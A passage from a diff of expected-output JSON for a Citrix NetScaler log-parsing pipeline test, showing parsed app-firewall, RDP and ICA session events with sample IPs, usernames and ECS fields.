Memory Allocation failed.", + "device_event_class_id": "APPFW", + "extended": { + "message": "Content length is too large(4294967296 Bytes). Memory Allocation failed." + }, + "facility": "local0", + "host": "ns1", + "name": "AF_MEMORY_ERR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "content_length_bytes": 4294967296, + "message": "Content length is too large(4294967296 Bytes). Memory Allocation failed." + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). Memory Allocation failed.", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern", + "device_event_class_id": "APPFW", + "extended": { + "message": "Signature id 429 contains no fast match pattern" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_SIGNATURE_ERR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Signature id 429 contains no fast match pattern", + "signature_id": "429" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United 
Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42", + "device_event_class_id": "APPFW", + "extended": { + "message": "Appfw maximum session Limit reached for PEID 42" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_SESSIONLIMIT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Appfw maximum session Limit reached for PEID 42", + "peid": "42" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + 
"ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity", + "device_event_class_id": "APPFW", + "extended": { + "message": "APPFW RFC Profile: WebApplicationSecurity" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_RFCPROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "appfw_rfc_profile": "WebApplicationSecurity", + "message": "APPFW RFC Profile: WebApplicationSecurity" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity", + "device_event_class_id": "APPFW", + "extended": { + "message": "APPFW RFC Profile: APIGatewaySecurity" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_RFCPROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "appfw_rfc_profile": 
"APIGatewaySecurity", + "message": "APPFW RFC Profile: APIGatewaySecurity" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature available: RuleID = 101", + "device_event_class_id": "APPFW", + "extended": { + "message": "New signature available: RuleID = 101" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_NEW_SIGNATURE_ADDED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "New signature available: RuleID = 101", + "rule_id": "101" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature 
available: RuleID = 101", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "rule": { + "id": "101" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles", + "device_event_class_id": "APPFW", + "extended": { + "message": "Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_DEPLOY_RELAXATION_DP", + "priority": "info" + }, + "citrix_adc": { + "log": { + "auto_deploy_mins": 15, + "message": "Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles", + "profile": "UserProfiles", + "violation_type": "XSS" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. 
Profile: UserProfiles", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe", + "device_event_class_id": "RDP", + "extended": { + "message": "User Name: JohnDoe" + }, + "facility": "local0", + "host": "ns1", + "name": "RDP_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "username": "JohnDoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "JohnDoe" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JohnDoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith", + "device_event_class_id": "RDP", + "extended": { + "message": "User Name: JaneSmith" + }, + "facility": "local0", + "host": "ns1", + "name": "RDP_CONNECTION_EVENT", + "priority": "info" + }, 
+ "citrix_adc": { + "log": { + "username": "JaneSmith" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "JaneSmith" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JaneSmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_SETUP", + "priority": "info" + }, + 
"citrix_adc": { + "log": { + "access_type": "1", + "client_cookie": "xyz123", + "client_hostname": "client1", + "client_ip": "1.128.0.0", + "client_launcher": "1", + "client_type": "2", + "client_version": "1.0.0", + "connection_priority": "5", + "device_serial_number": "1001", + "domain_name": "example.com", + "flags": "12345", + "message": "session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "server": { + "name": "ServerA" + }, + "session_guid": "ABC123", + "session_setup_time": "2023-04-05T12:34:56Z", + "status": "1", + "username": "user1" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ], + "user": [ + "user1" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com", + "name": "user1" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + 
"cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50" + }, + "facility": "local0", + "host": "ns1", + "name": "CHANNEL_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "channel_id_1": 1, + "channel_id_1_val": 10, + "channel_id_2": 2, + "channel_id_2_val": 20, + "channel_id_3": 3, + "channel_id_3_val": 30, + "channel_id_4": 4, + "channel_id_4_val": 40, + "channel_id_5": 5, + "channel_id_5_val": 50, + "channel_update": { + "begin": "2023-04-05T12:35:00Z", + "end": "2023-04-05T12:35:59Z" + }, + "client_cookie": "abc456", + "device_serial_number": "1002", + "flags": "67890", + "message": "session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "session_guid": "DEF456" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United 
Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 
2022-09-27T18:00:00.000 -" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "ghi789", + "connection_priority": "8", + "device_serial_number": "1003", + "flags": "13579", + "message": "session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "nsica_session": { + "acr_count": 1, + "client": { + "ip": "1.128.0.0", + "port": 12345 + }, + "reconnect_count": 3, + "server": { + "ip": "1.128.0.0", + "port": 54321 + }, + "status": "2" + }, + "session_guid": "GHI789", + "timestamp": "2022-09-27T18:00:00.000Z" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 54321 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": 
"firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -" + }, + "facility": "local0", + "host": "ns1", + "name": "L7_LATENCY_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "jkl012", + "device_serial_number": "1004", + "flags": "24680", + "l7_latency": { + "max_notify_count": 5, + "notify_interval": 30, + "threshold_factor": 2, + "waittime": "1970-01-01T00:01:40.000Z" + }, + "l7_threshold_breach": { + "avg_clientside_latency": 120, + "avg_serverside_latency": 80, + "max_clientside_latency": 150, + "max_serverside_latency": 100 + }, + "message": "session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - 
nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "min_l7_latency": 60, + "nsica_status": "3", + "session_guid": "JKL012" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid MNO345 - 
device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "mno345", + "device_serial_number": "1005", + "flags": "54321", + "message": "session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "session_end_time": "2023-04-05T12:37:00Z", + "session_guid": "MNO345" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "device_event_class_id": "ICA", + "extended": { + "message": 
"session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3" + }, + "facility": "local0", + "host": "ns1", + "name": "NETWORK_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "pqr678", + "clientside": { + "jitter": 2, + "packet_retransmits": 5, + "rtt": "130", + "rxbytes": 1500, + "txbytes": 2000 + }, + "device_serial_number": "1006", + "flags": "98765", + "ica_rtt": "120", + "message": "session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "serverside": { + "jitter": 3, + "packet_retransmits": 3, + "rtt": "140" + }, + "session_guid": "PQR678" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1500 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + 
